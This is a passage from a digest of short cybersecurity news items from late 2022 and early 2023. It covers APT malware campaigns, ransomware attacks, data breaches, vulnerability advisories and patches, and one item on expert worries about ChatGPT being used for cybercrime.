    The StrongPity APT hacking group is distributing a fake Shagle chat app that is a trojanized version of the Telegram for Android app with an added backdoor. Shagle is a legitimate random-video-chat platform allowing strangers to talk via an encrypted communications channel. However, the platform is entirely web-based, not offering a mobile app” (Bleeping Computer, 2023). Since 2021, StrongPity has been using a fake website to impersonate the actual Shagle website, with the goal of tricking victims into downloading malicious Android application. The malicious app can be used by the attacker to conduct espionage on targeted victims including, monitoring phone calls, collecting SMS text messages, and grabbing their contact lists for continued attacks. StrongPity, also known as Promethium or APT-C-41, has used trojanized applications in previous campaigns, including malicious versions of Notepad++, WinRAR, and TrueCrypt.

    AUTH0 Fixes RCE Flaw in Jsonwebtoken Library Used by 22,000 Projects

    Auth0 fixed a remote code execution vulnerability in the immensely popular 'JsonWebToken' open-source library used by over 22,000 projects and downloaded over 36 million times per month on NPM. The library is used in open source projects created by Microsoft, Twilio, Salesforce, Intuit, Box, IBM, Docusign, Slack, SAP, and many more.

    Microsoft: Kubernetes Clusters Hacked in Malware Campaign via Postgresql

    It’s been reported that the Kinsing malware is now actively breaching Kubernetes clusters by leveraging known weaknesses in container images and misconfigured, exposed PostgreSQL containers. While these tactics aren't novel, Microsoft's Defender for Cloud team reports they have seen an uptick lately, indicating that the threat actors are actively looking for specific entry points.

    GitHub Makes It Easier to Scan Your Code for Vulnerabilities

    GitHub has introduced a new option to set up code scanning for a repository known as "default setup," designed to help developers configure it automatically with just a few clicks. While the CodeQL code analysis engine, which powers GitHub's code scanning, comes with support for many languages and compilers, the new option only shows up for Python, JavaScript, and Ruby repositories. Product marketing manager Walker Chabbott said that GitHub is working on expanding support to more languages over the next six months.

    Microsoft Ends Windows 7 Extended Security Updates on Tuesday

    Windows 7 Professional and Enterprise editions will no longer receive extended security updates for critical and important vulnerabilities starting Tuesday, January 10, 2023. Microsoft launched the legacy operating system in October 2009. It then reached its end of support in January 2015 and its extended end of support in January 2020. The Extended Security Update (ESU) program was the last resort option for customers who still needed to run legacy Microsoft products past their end of support on Windows 7 systems.

    Hackers Push Fake Pokemon NFT Game to Take Over Windows Devices

    Threat actors are using a well-crafted Pokemon NFT card game website to distribute the NetSupport remote access tool and take control over victims' devices. The website "pokemon-go[.]io," which is still online at the time of writing, claims to be home to a new NFT card game built around the Pokemon franchise, offering users strategic fun together with NFT investment profits.

    Zoom Users At Risk In Latest Malware Campaign

    Cyble Research & Intelligence Labs (CRIL) recently identified a phishing campaign targeting Zoom application software to deliver the IcedID malware. IcedID, also known as BokBot, is a banking trojan that enables attackers to steal victims’ banking credentials. This malware primarily targets businesses and can be used to steal payment information. In addition, IcedID acts as a loader, allowing it to deliver other malware families or download additional modules. IcedID usually spreads via spam emails with malicious Office file attachments. However, in this campaign, the attackers employed a phishing website to deliver the IcedID payload, which is not a typical distribution method for IcedID. The TAs behind this campaign used a highly convincing phishing page that looked like a legitimate Zoom website to trick users into downloading the IcedID malware, which carries out malicious activities.

    Russian Turla Hackers Hijack Decade-Old Malware Infrastructure to Deploy New Backdoors

    The Russian cyberespionage group known as Turla has been observed piggybacking on attack infrastructure used by a decade-old malware to deliver its own reconnaissance and backdoor tools to targets in Ukraine. Google-owned Mandiant, which is tracking the operation under the uncategorized cluster moniker UNC4210, said the hijacked servers correspond to a variant of a commodity malware called ANDROMEDA (aka Gamarue) that was uploaded to VirusTotal in 2013. ‘UNC4210 re-registered at least three expired ANDROMEDA command-and-control (C2) domains and began profiling victims to selectively deploy KOPILUWAK and QUIETCANARY in September 2022,’ Mandiant researchers said in an analysis published last week.

    Bitdefender Releases Free MegaCortex Ransomware Decryptor

    Antivirus company Bitdefender has released a decryptor for the MegaCortex ransomware family, making it possible for victims of the once notorious gang to restore their data for free. The creation of the decryptor was the combined work of Bitdefender analysts and experts from Europol, the NoMoreRansom Project, and the Zürich Public Prosecutor's Office and Cantonal Police. Using the decryptor is pretty straightforward, as it's a standalone executable that doesn't require installation and offers to locate encrypted files on the system automatically. Moreover, the decryptor can back up the encrypted files for safety in case something goes wrong in the decryption process that could corrupt the files beyond recovery. Also, for those who attempted to decrypt their files previously with mixed success, the new decryptor offers an advanced setting to replace them with clean files.

    Rackspace: Customer Email Data Accessed in Ransomware Attack

    Rackspace revealed on Thursday that attackers behind last month's incident accessed some of its customers' Personal Storage Table (PST) files which can contain a wide range of information, including emails, calendar data, contacts, and tasks. This update comes after Rackspace confirmed that the Play ransomware operation was behind the cyberattack that took down its hosted Microsoft Exchange environment in December. As discovered during the now-finished investigation led by cybersecurity firm Crowdstrike, the attackers gained access to the personal storage folders of 27 Rackspace customers.

    Hackers Abuse Windows Error Reporting Tool to Deploy Malware

    Hackers are abusing the Windows Problem Reporting (WerFault.exe) error reporting tool for Windows to load malware into a compromised system's memory using a DLL sideloading technique. The use of this Windows executable is to stealthy infect devices without raising any alarms on the breached system by launching the malware through a legitimate Windows executable. The new campaign was spotted by K7 Security Labs, which could not identify the hackers, but they are believed to be based in China.

    Zoho Warns About Critical Security Flaw Detected in ManageEngine Products

    Zoho, a business software provider, released a security advisory encouraging its customers to patch a critical security flaw affecting three ManageEngine products immediately, BleepingComputer reports. The SQL injection vulnerability, CVE-2022-47523, was found in Zoho's PAM360 privileged access management software, Password Manager Pro secure vault, and Access Manager Plus privileged session management solution.

    SpyNote Android Malware Infections Surge After Source Code Leak

    During the final quarter of 2021, researchers noted an increase in detections for SpyNote (SpyMax), an Android malware with spying capabilities. The increase in SpyNote infections is likely the result of a source code leak of another piece of malware called CypherRat. “CypherRat combined SpyNote's spying capabilities, such as offering remote access, GPS tracking, and device status and activity updates, with banking trojan features that impersonate banking institutions to steal account credentials” (Bleeping Computer, 2022). CypherRat was sold on private Telegram channels over the second half of 2021, but the author of the malware decided to publish the malwares source code to GitHub. Other threat actors have now leveraged the available source code to launch their own campaigns.

    Hackers Use CAPTCHA Bypass to Make 20K Github Accounts in a Month

    A threat actor group out of South Africa known as 'Automated Libra' has been improving their techniques to make a profit by using cloud platform resources for cryptocurrency mining. According to Palo Alto Networks Unit 42, the threat actors use a new CAPTCHA solving system, follow a more aggressive use of CPU resources for mining, and mixe 'freejacking' with the "Play and Run" technique to abuse free cloud resources.

    Zoho Urges Admins to Patch Critical ManageEngine Bug Immediately

    Zoho is urging customers to patch a critical security flaw impacting multiple ManageEngine products. Tracked as CVE-2022-47523, the flaw is related to a SQL injection vulnerability in the company’s Password Manager Pro secure vault, PAM360 privileged access management software, and Access Manager Plus privileged session management solution. According to Zoho, successful exploitation could enable threat actors to gain unauthenticated access to the backend database and execute queries to retrieve database table entries.
    Below is a list of the impacted product versions:
    Password Manager Pro 12200 and below
    PAM360 5800 and below
    Access Manager Plus 4308 and below

    Database of the Cricketsocial[.]com Platform Left Open Online

    CyberNews discovered that a database used by the platform was left open online, it contains a huge trove of data. The Social platform for the cricket community exposed over 100k entries of private customer data and credentials. The database, hosted by Amazon Web Services (AWS) in the US, contained admin credentials and private customer data, including email, phone numbers, names, hashed user passwords, dates of birth, and addresses.

    Slack's Private GitHub Code Repositories Stolen over Holidays

    Slack in a statement this week, alerted users of an incident over the holiday’s which impacted some of its private GitHub code repositories. The incident involved a threat actors gaining access to Slack’s externally hosted GitHub repositories via stolen Slack employee tokens. While some of Slack's private code repositories were breached, Slack’s primary codebase and customer data remained unaffected, according to the company.

    Fortinet Fixed Multiple Command Injection Bugs in Fortiadc and Fortitester

    Cybersecurity vendor Fortinet addressed several vulnerabilities impacting its products. The company also warned customers of a high-severity command injection flaw, tracked as CVE-2022-39947 (CVSS score of 8.6), affecting the Application Delivery Controller FortiADC. The CVE-2022-39947 flaw is an improper neutralization of special elements used in an OS Command vulnerability in FortiADC, it can potentially lead to arbitrary code execution via specifically crafted HTTP requests.

    Rail Giant Wabtec Discloses Data Breach After Lockbit Ransomware Attack

    U.S. rail and locomotive company Wabtec Corporation has disclosed a data breach that exposed personal and sensitive information. Wabtec is a U.S.-based public company producing state-of-the-art locomotives and rail systems. The company employs approximately 25,000 people and has a presence in 50 countries, being the world's market leader in freight locomotives and a major player in the transit segment. The firm's 2021 financial results give a revenue figure of $7.8 billion, reporting a staggering 20% of the world's freight being moved by the 23,000 of Wabtec's locomotives in global operation.

    Synology Fixes Maximum Severity Vulnerability in VPN Routers

    Taiwan-based NAS maker Synology has addressed a maximum (10/10) severity vulnerability affecting routers configured to run as VPN servers. The vulnerability, tracked as CVE-2022-43931, was discovered internally by Synology's Product Security Incident Response Team (PSIRT) in the VPN Plus Server software and was given a maximum CVSS3 Base Score of 10 by the company. VPN Plus Server is a virtual private network server that allows administrators to set up Synology routers as a VPN server to allow remote access to resources behind the router.

    New Shc Linux Malware Used to Deploy CoinMiner

    The ASEC analysis team recently discovered that a Linux malware developed with shell script compiler (shc) that threat actors used to install a CoinMiner. The experts believe attackers initially compromised targeted devices through a dictionary attack on poorly protected Linux SSH servers, then they installed multiple malware on the target system, including the Shc downloader, XMRig CoinMiner, and a Perl-based DDoS IRC Bot.

    Thousands of Citrix Servers Still Unpatched for Critical Vulnerabilities

    According to NCC Group's Fox-IT research team, thousands of Citrix Application Delivery Controller (ADC) and Gateway endpoints remain vulnerable to two critical security flaws disclosed by the company over the last few months. The vulnerabilities in question are being tracked as CVE-2022-27510 and CVE-2022-27518 and have both received a CVSS score of 9.8, indicating a critical level of severity.

    New Linux Malware Uses 30 Plugin Exploits to Backdoor WordPress Sites

    A previously unknown Linux malware has been exploiting 30 vulnerabilities in multiple outdated WordPress plugins and themes to inject malicious JavaScript. According to a report by antivirus vendor Dr. Web, the malware targets both 32-bit and 64-bit Linux systems, giving its operator remote command capabilities. The main functionality of the trojan is to hack WordPress sites using a set of hardcoded exploits that are run successively, until one of them works.

    Atlantic Council: Beyond Attribution: Seeking National Responsibility for Cyber Attacks

    Nations cannot use these levers of power against an individual stone-thrower, but can use them against the nation that abets him. For countries that are willing to cooperate to reduce the numbers of insecure systems, there should be offers of funding, training, education, and access to technology. If a nation repeatedly refuses to cooperate, states on the receiving ends of continuing attacks must have recourse to the traditional full spectrum of coercive policies, from démarches to sanctions in the UN Security Council, prosecution in international courts, and all the way to covert action and kinetic military force.

    Seeking National Responsibility for Cyber Attack

    This paper accordingly introduced the spectrum of state responsibility to shift the discussion away from “attribution fixation,” to national responsibility for attacks in cyberspace. The global national security community needs to shift resources from the technical attribution problem to solving the responsibility problem. This re-establishes state-to-state symmetry and enables a wider range of options open to sovereign nations: diplomatic, intelligence, military, and economic responses.

    Ransomware Gang Apologizes, Gives SickKids Hospital Free Decryptor

    SickKids is a teaching and research hospital in Toronto that provides healthcare to sick children. On December 18th, the hospital suffered a ransomware attack that impacted internal and corporate systems, hospital phone lines, and the website. While the attack only encrypted a few systems, SickKids stated that the incident caused delays in receiving lab and imaging results and resulted in longer patient wait times.

    Ransomware Gang Cloned Victim’s Website to Leak Stolen Data

    On December 26, the threat actor published on their data leak site hidden on the Tor network that they had compromised a company in financial services. As the victim did not meet the threat actor’s demands, BlackCat published all the stolen files as a penalty. As a deviation from the usual process, the hackers decided to also leak the data on a site that mimics the victim's as far as the appearance and the domain name go.

    FBI Recommends Ad Blockers as Cybercriminals Impersonate Brands in Search Engine Ads

    The Federal Bureau of Investigation (FBI) this week raised the alarm on cybercriminals impersonating brands in advertisements that appear in search engine results. The agency has advised consumers to use ad blockers to protect themselves from such threats. The attackers register domains similar to those of legitimate businesses or services and use those domains to purchase ads from search engine advertisement services, the FBI says in an alert. These nefarious ads are displayed at the top of the web page when the user searches for that business or service, and the user might mistake them for an actual search result.

    Vice Society Ransomware Gang Switches to New Custom Encryptor

    The Vice Society ransomware operation has switched to using a custom ransomware encrypt that implements a strong, hybrid encryption scheme based on NTRUEncrypt and ChaCha20-Poly1305. According to cybersecurity firm SentinelOne, which discovered the new strain and named it "PolyVice," it's likely that Vice Society sourced it from a vendor who supplies similar tools to other ransomware groups.

    Comcast Xfinity Accounts Hacked in Widespread 2FA Bypass Attacks

    Comcast Xfinity customers report their accounts being hacked in widespread attacks that bypass two-factor authentication. These compromised accounts are then used to reset passwords for other services, such as the Coinbase and Gemini crypto exchanges. Starting on December 19th, many Xfinity email users began receiving notifications that their account information had been changed. However, when attempting to access the accounts, they could not log in as the passwords had been changed.

    An Iranian Group Hacked Israeli CCTV Cameras, Defense Was Aware but Didn’t Block It

    An Iranian group of hackers, known as Moses Staff, had seized control of dozens of Israeli CCTV cameras; the hack was known to the authorities that did nothing to stop it, reported The Times of Israel, which had access to a preview of the full investigative report, “In a preview of a full investigative report set to be aired on Tuesday, the Kan public broadcaster said officials did not take action to secure the cameras, despite their knowledge of the activities of the group, known as Moses Staff.” reported The Times of Israel.

    Leading Sports Betting Firm BetMGM Discloses Data Breach

    Leading sports betting company BetMGM disclosed a data breach after a threat actor stole personal information belonging to an undisclosed number of customers. While the personal info stolen in the attack varies for each customer, the attackers obtained a wide range of data, including names, contact info (like postal addresses, email addresses, and phone numbers), dates of birth, hashed Social Security numbers, account identifiers (like player IDs and screen names) and info related to transactions with BetMGM. The company added that it discovered the incident on November 2022 but believes the breach occurred in May 2022.

    FIN7 Hackers Create Auto-Attack Platform to Breach Exchange Servers

    The notorious FIN7 hacking group uses an automated attack system that exploits Microsoft Exchange and SQL injection vulnerabilities to breach corporate networks, steal data, and select targets for ransomware attacks based on financial size. This system was discovered by Prodaft's threat intelligence team, which has been closely following FIN7 operations for years now. In a report shared with BleepingComputer before publication, Prodaft reveals details about FIN7's internal hierarchy, affiliations with various ransomware projects, and a new SSH backdoor system used for stealing files from compromised networks.

    Okta Code Repositories Copied

    Yesterday, BleepingComputer claimed to have obtained a 'confidential' security incident notification that Okta has been emailing to its security contacts. Okta has released an official statement which you can find below: “In alignment with our core value of transparency, we are sharing context and details around a recent security event affecting Okta code repositories. There is no impact to any customers, including any HIPAA, FedRAMP or DoD customers. No action is required by customers”

    Zerobot Malware Now Spreads by Exploiting Apache Vulnerabilities

    The Zero bot botnet has been upgraded to infect new devices by exploiting security vulnerabilities affecting Internet-exposed and unpatched Apache servers. The Microsoft Defender for IoT research team also observed that this latest version adds recent distributed denial-of-service (DDoS) capabilities. Zero bot has been under active development since at least November, with new versions adding new modules and features to expand the botnet's attack vectors and make it easier to infect new devices, including firewalls, routers, and cameras. Since early December, the malware's developers have removed modules that targeted phpMyAdmin servers, Dasan GPON home routers, and D-Link DSL-2750B wireless routers with year-old exploits.

    Corsair Keyboard Bug Makes It Type on Its Own, No Malware Involved

    Corsair has confirmed that a bug in the firmware of K100 keyboards, and not malware, is behind previously entered text being auto-typed into applications days later. The company's statement comes after multiple K100 users have reported that their keyboards are typing text on their own at random moments. The company's announcement comes after numerous K100 users have reported that their keyboards are typing text on their own at unexpected moments. A Corsair spokesperson responded to concerns, saying that their keyboards do not have keylogging capabilities, nor do they actively monitor what users type on them. Unfortunately, the latest firmware update made available to K100 devices (version 1.11.39) a couple of weeks back does not fix the issue. To make matters worse, this latest firmware update has caused random freezes on the keyboard, which some users report may be linked to the high polling rate setting.

    Protect Yourself from Social Security Scams

    Scammers are pretending to be government employees. They may threaten you and may demand immediate payment to avoid arrest or other legal action. These criminals continue to evolve and find new ways to steal your money and personal information. Do not fall for it! We want you to know how you and your loved ones can avoid becoming victims!

    Microsoft Shares Details for a Gatekeeper Bypass Bug in Apple MacOS

    Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score: 5.5) in Apple macOS that threat actors could exploit to bypass the Gatekeeper security feature; The Apple Gatekeeper is designed to protect OS X users by performing several checks before allowing an App to run. The flaw was discovered on July 27, 2022, by Jonathan Bar-Or from Microsoft; it is a logic issue that was addressed with improved checks, “On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple’s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call “Achilles”.” reads the post published by Microsoft.

    Microsoft Pushes Emergency Fix for Windows Server Hyper-V VM Issues

    Microsoft has released an emergency out-of-band (OOB) Windows Server update to address a known issue breaking virtual machine (VM) creation on Hyper-V hosts after installing this month's Patch Tuesday updates. The problem affects only VMs managed with the System Center Virtual Machine Manager (SCVMM) and using Software Defined Networking.

    GodFather Android Banking Trojan Targeting Users of Over 400 Banking and Crypto Apps

    An Android banking trojan known as GodFather is being used to target users of more than 400 banking and cryptocurrency apps spanning across 16 countries. This includes 215 banks, 94 crypto wallet providers, and 110 crypto exchange platforms serving users in the U.S., Turkey, Spain, Italy, and Canada, among others, Singapore-headquartered Group-IB said in a report shared with The Hacker News. The malware, like many financial trojans targeting the Android ecosystem, attempts to steal user credentials by generating convincing overlay screens (aka web fakes) that are served atop target applications.

    Organizations Warned of New Attack Vector in Amazon Web Services

    A new security threat to a recently introduced functionality in Amazon Web Services (AWS) has been uncovered by researchers from Mitiga. The attack vector relates to AWS’ Amazon Virtual Private Cloud feature ‘Elastic IP transfer,’ which was announced in October 2022. This feature enables a far easier transfer of Elastic IP addresses from one AWS account to another.

    Raspberry Robin Worm Drops Fake Malware to Confuse Researchers

    This new tactic was discovered by Trend Micro researchers who observed Raspberry Robin in recent attacks against telecommunication service providers and government systems. Raspberry Robin is a worm-like malware dropper that sells initial access to compromised networks to ransomware gangs and malware operators. It has been previously associated with FIN11 and the Clop gang, as well as Bumblebee, IcedID, and TrueBot payload distribution.

    Play ransomware claims attack on German hotel chain H-Hotels

    The Play ransomware gang has claimed responsibility for a cyber attack on H-Hotels (h-hotels.com) that has resulted in communication outages for the company. H-Hotels is a hospitality business with 60 hotels in 50 locations across Germany, Austria, and Switzerland, offering a total capacity of 9,600 rooms. The hotel chain employs 2,500 people and is one of the largest in the DACH region, operating under 'H-Hotels' and the sub-brands Hyperion, H4 Hotels, H2 Hotels, H + Hotels, H.ostels, and H.omes.

    Microsoft Finds macOS Bug That Lets Malware Bypass Security Checks

    On Monday, Microsoft published details of a recently patched vulnerability (CVE-2022-42821) in macOS, dubbed “Achilles,” that could enable threat actors to bypass application execution restrictions imposed by Apple’s Gatekeeper mechanism. Gatekeeper is a security feature in macOS that automatically checks apps downloaded from the Internet if they are notarized and developer-signed (approved by Apple), asking the user to confirm before launching or issuing an alert that the app cannot be trusted. Similar to the Mark of the web flags employed in Windows, Gatekeeper checks for an extended attribute called com.apple.quarantine which is assigned by web browsers to all downloaded files.

    Malicious ‘SentinelOne’ PyPI Package Steals Data from Developers

    Threat actors have published a malicious Python package on PyPI, named 'SentinelOne,' that pretends to be the legitimate SDK client for the trusted American cybersecurity firm but, in reality, steals data from developers. Most concerning, the package offers the expected functionality by accessing the SentinelOne API from within another project. This means many developers may not realize they have been compromised. The malicious package has been trojanized to steal sensitive data from compromised developer systems. The packages were discovered by experts at ReversingLabs, who reported the issue and had the malicious PyPi packages removed. The first package was uploaded on December 11, 2022, and had been updated twenty times since then.

    T-Mobile Hacker Gets 10 Years for $25 Million Phone Unlock Scheme

    Argishti Khudaverdyan, the former owner of a T-Mobile retail store, was sentenced to 10 years in prison for a $25 million scheme where he unlocked and unblocked cellphones by hacking into T-Mobile's internal systems. Between August 2014 and June 2019, the 44-year-old man behind the scheme, who was also ordered to pay $28,473,535 in restitution, "cleaned" hundreds of thousands of cellphones for his "customers.

    Microsoft: KB5021233 Causes Blue Screens With 0xc000021a Errors

    Microsoft is investigating a known issue leading to Blue Screen of Death (BSOD) crashes with 0xc000021a errors after installing the Windows 10 KB5021233 cumulative update released during this month's Patch Tuesday. The company warned over the weekend that "after installing KB5021233, some Windows devices might start up to an error (0xc000021a) with a blue screen." According to researcher this known issue is likely caused by a mismatch between the file versions of hidparse.sys in system32 and system32/drivers in the Windows folder, "which might cause signature validation to fail when cleanup occurs.

    New Agenda Ransomware Variant, Written in Rust, Aiming at Critical Infrastructure

    On Friday, researchers at Trend Micro disclosed details of a new Rust variant of the ransomware strain Agenda, which includes new features allowing for faster encryption and detection evasion. Agenda, also known as Qilin, is a ransomware-as-a-service operation that was first spotted a few months ago in August, 2022 targeting healthcare and education sectors in countries like Thailand and Indonesia. Agenda’s ransomware strains were originally written in the Go programming language. However, in just a short amount of time, the actors have switched to Rust, a cross-platform language that enables the malware to target different operating systems including Windows and Linux.

    Google Takes Gmail Security to the Next Level with Client-Side Encryption

    Google on Friday announced that its client-side encryption for Gmail is in beta for Workspace and education customers as part of its efforts to secure emails sent using the web version of the platform. The development comes at a time when concerns about online privacy and data security are at an all-time high, making it a welcome change for users who value the protection of their personal data. To that end, Google Workspace Enterprise Plus, Education Plus, and Education Standard customers can apply to sign up for the beta until January 20, 2023. It's not available to personal Google Accounts.

    NIST to Scrap SHA-1 Algorithm by 2030

    The US National Institute of Standards and Technology (NIST) has announced the phasing out of the secure hash algorithm (SHA)-1 in the federal government. The agency said it will stop using SHA-1 in its last remaining specified protocols by December 31, 2030. It also recommended that all IT professionals replace the algorithm by the end of the decade, and modules that still use SHA-1 after December 2030 will not be permitted for purchase by the federal government, NIST said in an announcement on December 15.

    Phishing Attack Uses Facebook Posts to Evade Email Security

    A new phishing campaign uses Facebook posts as part of its attack chain to trick users into giving away their account credentials and personally identifiable information (PII). The emails sent to targets pretend to be a copyright infringement issue on one of the recipient's Facebook posts, warning that their account will be deleted within 48 hours if no appeal is filed. The link to appeal the account deletion is an actual Facebook post on facebook.com, helping threat actors bypass email security solutions and ensure their phishing messages land in the target's inbox. The Facebook post pretends to be "Page Support," using a Facebook logo to appear as if the company manages it. However, this post includes a link to an external phishing site named after Meta, Facebook’s owner company, to slightly reduce the chances of victims realizing the scam.

    Veeam Backup and Replication Vulnerabilities Being Exploited in Attacks

    CISA recently added two new vulnerabilities to its catalog of Known Exploited Vulnerabilities (KEV), impacting Veeam Backup and Replication Software. The vulnerabilities are being tracked as CVE-2022-26500 and CVE-2022-26501 and have been given a CVSS score of 9.8, indicating a critical level of severity. CVE-2022-26500 is related to an Improper limitation of path names in Veeam Backup & Replication while CVE-2022-26501 is related to an Improper authentication in Veeam Backup and & Replication. Both flaws can be exploited for remote code execution, in turn allowing attackers to compromise and take control of targeted systems.

    IT-ISAC Holiday Ransomware Metrics - November 1st - Today

    I created this report for another information sharing group we work with. At the IT-ISAC we have been tracking ransomware attacks going back to January of 2021. I crunched some number from November 1, 2022 - Today. Please find a PDF attached and a CSV of recent events. Our metrics are gathered from industry partners, open source reporting, and manual scans of ransomware leak sites by the IT-ISAC operations team. I will note that they are likely skewed towards the IT sector, which will throw off the statistics.

    Microsoft Fixes Bug That Made Task Manager Partially Unreadable

    Microsoft has addressed a known issue that made parts of the Task Manager unreadable after installing the KB5020044 November preview update on Windows 11 22H2 systems. As Redmond explained when confirming the issue two weeks ago, affected users see some user interface elements of the Task Manager displayed using unexpected colors that make them unreadable.

    FuboTV Says World Cup Streaming Outage Caused by a Cyberattack

    At approximately 2 PM ET, as users were getting ready to watch the World Cup semifinal, FuboTV subscribers could not log in to the streaming service. Instead, they were greeted with a CB_ERR_OPEN error, stating "ff: downstream not available" when logging in. Subscribers could not contact support to report the problem, as it requires a user to first log in to the FuboTV site, which could no longer be done.

    Former Twitter Employee Gets 42 Months for Saudi Scheme

    A former Twitter employee has been handed a jail sentence of over three years after accepting bribes from the Kingdom of Saudi Arabia (KSA) in return for accessing dissidents’ accounts. Ahmad Abouammo, 45, formerly of Walnut Creek, was convicted in August of acting as a foreign agent without notice to the attorney general, conspiracy, wire fraud, international money laundering and falsification of records in a federal investigation.

    FBI Seized Domains Linked to 48 DDoS-for-hire Service Platforms

    The US Department of Justice has seized 48 Internet domains and charged six suspects for their involvement in running ‘Booter’ or ‘Stresser’ platforms that allow anyone to easily conduct distributed denial of service attacks. Booters are online platforms allowing threat actors to pay for distributed denial-of-service attacks on websites and Internet-connected devices. Essentially, they are "booting" the target off of the Internet. Stressers offer the same DDoS features but claim to be provided for legitimate testing of the reliability of web services and the servers behind them.

    Microsoft Reclassifies SPNEGO Extended Negotiation Security Vulnerability as 'Critical’

    Microsoft reclassified the severity of an information disclosure vulnerability in SPNEGO NEGOEX that it patched in September 2022, after discovering the flaw could enable attackers to remotely execute code. “SPNEGO, short for Simple and Protected GSSAPI Negotiation Mechanism (SPNEGO), is a scheme that allows a client and remote server to arrive at a consensus on the choice of the protocol to be used (e.g., Kerberos or NTLM) for authentication”.

    Hacking Using SVG Files to Smuggle QBot Malware onto Windows Systems

    Phishing campaigns involving the Qakbot malware are using Scalable Vector Graphics (SVG) images embedded in HTML email attachments. The new distribution method was spotted by Cisco Talos, which said it identified fraudulent email messages featuring HTML attachments with encoded SVG images that incorporate HTML script tags. HTML smuggling is a technique that relies on using legitimate features of HTML and JavaScript to run encoded malicious code contained within the lure attachment and assemble the payload on a victim's machine as opposed to making an HTTP request to fetch the malware from a remote server. In other words, the idea is to evade email gateways by storing a binary in the form of a JavaScript code that's decoded and downloaded when opened via a web browser.

    Hackers Target Japanese Politicians With New Mirrorstealer Malware

    The MirrorFace hacking group (APT10 and Cicada) began sending spear-phishing emails to their targets on June 29, 2022, pretending to be PR agents from the recipient’s political party, asking them to post the attached video files on social media. The threat actors impersonated a Japanese ministry, attaching decoy documents that extract WinRAR archives in the background. The library contained an encrypted copy of the LODEINFO malware, a malicious DLL loader, and an innocuous application (K7Security Suite) used for DLL search order hijacking.

    Apple Fixed the Tenth Actively Exploited Zero-Day This Year

    Apple released security updates to address a new zero-day vulnerability, tracked as CVE-2022-42856, that is actively exploited in attacks against iPhones. The flaw is the tenth actively exploited zero-day vulnerability since the start of the year. The IT giant released security bulletins for iOS/iPadOS 15.7.2, Safari 16.2, tvOS 16.2, and macOS Ventura 13.1.

    Microsoft-Signed Malicious Windows Drivers Used in Ransomware Attacks

    In reports released today, researchers explain how they found a new toolkit consisting of two components named STONESTOP (loader) and POORTRY (kernel-mode driver) being used in "bring your own vulnerable driver" (BYOVD) attacks. According to Mandiant and SentinelOne, STONESTOP is a user-mode application that attempts to terminate endpoint security software processes on a device. Another variant includes the ability to overwrite and delete files.

    Lockbit Claims Attack on California’s Department of Finance

    On Monday, LockBit Ransomware gang claimed on its data leak site to have breached the Department of Finance in California. As proof of their claim, the threat actors published a few screenshots of the files allegedly stolen from the government agency. In total, 246,000 files in more than 114,000 folders amounting to 76 GB of data were allegedly exfiltrated which includes databases, confidential data, financial documents, certifications, and IT documents. The ransomware actors have placed a counter on their post, stating that they will publish all of the files stolen if a ransom is not paid by December 24.

    Microsoft December 2022 Patch Tuesday Fixes 2 Zero-Days, 49 Flaws

    As part of the December 2022 Patch Tuesday, Microsoft addressed 49 flaws, including two zero-days, one of which is being actively exploited in attacks. Of the 49 flaws fixed, there was 17 elevation of privilege vulnerabilities, 2 security feature bypass vulnerabilities, 23 remote code execution vulnerabilities, 3 denial of service vulnerabilities, and 1 spoofing vulnerability. Six of the vulnerabilities have been rated critical in severity and relate to remote code execution.

    Uber Suffers New Data Breach After Attack on Vendor, Info Leaked Online

    Uber has suffered a new data breach after a threat actor leaked employee email addresses, corporate reports, and IT asset information stolen from a third-party vendor in a cybersecurity incident. Early Saturday morning, a threat actor named 'UberLeaks' began leaking data they claimed was stolen from Uber and Uber Eats on a hacking forum known for publishing data breaches. The leaked data includes numerous archives claiming to be source code associated with mobile device management platforms (MDM) used by Uber and Uber Eats and third-party vendor services.

    Fortinet Says SSL-VPN Pre-Auth RCE Bug Is Exploited in Attacks

    On Monday, Fortinet released an advisory to warn users against a vulnerability in its FortiOS SSL-VPN that is actively being exploited in attacks. Tracked as CVE-2022-42475, the flaw is related to a heap-based buffer overflow bug which could allow an unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests on vulnerable devices. CVE-2022-42475 was discovered and disclosed to Fortinet by French cybersecurity firm Olympe Cyberdefense. Shortly after the disclosure, Fortinet began rolling out new FortiOS versions to address the flaw.

    Amazon ECR Public Gallery Flaw Could Have Wiped or Poisoned Any Image

    Amazon ECR Public Gallery is a public repository of container images used for sharing ready-to-use applications and popular Linux distributions, such as Nginx, EKS Distro, Amazon Linux, CloudWatch agent, and Datadog agent. A Lightspin security analyst discovered a new flaw in the ECR Public Gallery where it's possible to modify existing public images, layers, tags, registries, and repositories of other users by abusing undocumented API actions.

    Experts Warn ChatGPT Could Democratize Cybercrime

    A wildly popular new AI bot could be used by would-be cyber-criminals to teach them how to craft attacks and even write ransomware, security experts have warned. ChatGPT was released by artificial intelligence R&D firm OpenAI last month and has already passed one million users. The prototype chatbot answers questions with apparent authority in natural language, by trawling vast volumes of data across the internet. It can even be creative, for example by writing poetry.

    State-Sponsored Attackers Actively Exploiting RCE in Citrix Devices, Patch ASAP!

    An unauthenticated remote code execution flaw (CVE-2022-27518) is being leveraged by a Chinese state-sponsored group to compromise Citrix Application Delivery Controller (ADC) deployments, the US National Security Agency has warned. “Targeting Citrix ADCs can facilitate illegitimate access to targeted organizations by bypassing normal authentication controls.” CVE-2022-27518 stems from the vulnerable devices’ software failing to maintain control over a resource throughout its lifetime (creation, use, and release) and gives remote attackers the opportunity to execute arbitrary code (without prior authentication) on vulnerable appliances.

    Claroty - Abusing JSON-Based SQL to Bypass WAF

    Claroty's Team82 has developed a technique to bypass industry-leading web application firewalls (WAF) by appending JSON syntax to SQL injection payloads. WAFs are designed to protect web-based applications and APIs from malicious traffic, but this technique works because major WAF vendors lack support for JSON syntax, despite it being supported by most database engines for a decade. This means that appending JSON to SQL syntax can leave the WAF blind to attacks. The technique was tested against WAFs from Palo Alto Networks, Amazon Web Services, Cloudflare, F5, and Imperva, and all five have been notified and have updated their products to support JSON syntax.

    Hackers Earn $989,750 for 63 Zero-Days Exploited at pwn2own Toronto

